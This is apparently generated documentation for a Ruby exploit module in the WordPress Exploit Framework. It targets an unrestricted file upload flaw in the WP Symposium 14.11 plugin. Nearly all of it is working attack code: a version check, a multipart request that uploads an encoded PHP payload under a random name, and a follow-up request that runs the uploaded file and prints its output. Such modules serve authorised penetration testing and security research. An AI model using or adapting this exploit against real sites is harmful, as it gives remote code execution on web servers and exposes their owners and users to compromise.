class Wpxf::Exploit::SymposiumShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'WP Symposium 14.11 Unrestricted File Upload',
    desc: 'WP Symposium Plugin for WordPress contains a flaw that allows a '\
          'remote attacker to execute arbitrary PHP code. This flaw exists '\
          'because the /wp-symposium/server/file_upload_form.php script '\
          'does not properly verify or sanitize user-uploaded files. By '\
          'uploading a .php file, the remote system will place the file in '\
          'a user-accessible path. Making a direct request to the uploaded '\
          'file will allow the attacker to execute the script with the '\
          'privileges of the web server.',
    author: [
      'Claudio Viviani', # Vulnerability disclosure
      'rastating'        # WPXF module
    ],
    references: [
      ['WPVDB', '7716']
    ],
    date: 'Dec 11 2014'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 31
def check
  check_plugin_version_from_readme('wp-symposium', '14.12')
end
payload_body_builder(payload_name, directory_name) click to toggle source
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 44
def payload_body_builder(payload_name, directory_name)
  builder = Utility::BodyBuilder.new
  builder.add_field('uploader_uid', '1')
  builder.add_field('uploader_dir', "./#{directory_name}/")
  builder.add_field('uploader_url', symposium_url.sub(base_uri, ''))
  builder.add_file_from_string('files[]', payload.encoded, payload_name)
  builder
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 53
def run
  return false unless super

  emit_info 'Preparing payload...'
  payload_id = Utility::Text.rand_alpha(10)
  payload_file = "#{payload_id}.php"
  payload_url = normalize_uri(symposium_url, payload_id, payload_file)
  builder = payload_body_builder(payload_file, payload_id)

  emit_info 'Uploading the payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: normalize_uri(symposium_url, 'index.php'), body: body)
  end

  if successful_upload(res)
    emit_success "Uploaded the payload to #{payload_url}", true
    emit_info 'Executing the payload...'
    res = execute_get_request(url: payload_url)

    if res && res.code == 200 && !res.body.strip.empty?
      emit_success "Result: #{res.body}"
    end

    return true
  else
    emit_error "HTTP status: #{res.code}", true
    emit_error "Server returned: #{res.body}", true
    emit_error 'Failed to upload the payload'
    return false
  end
end
successful_upload(res) click to toggle source
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 39
def successful_upload(res)
  res && res.code == 200 && res.body.length > 0 &&
  !res.body.include?('error') && !res.body.eql?('0')
end
symposium_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 35
def symposium_url
  normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
end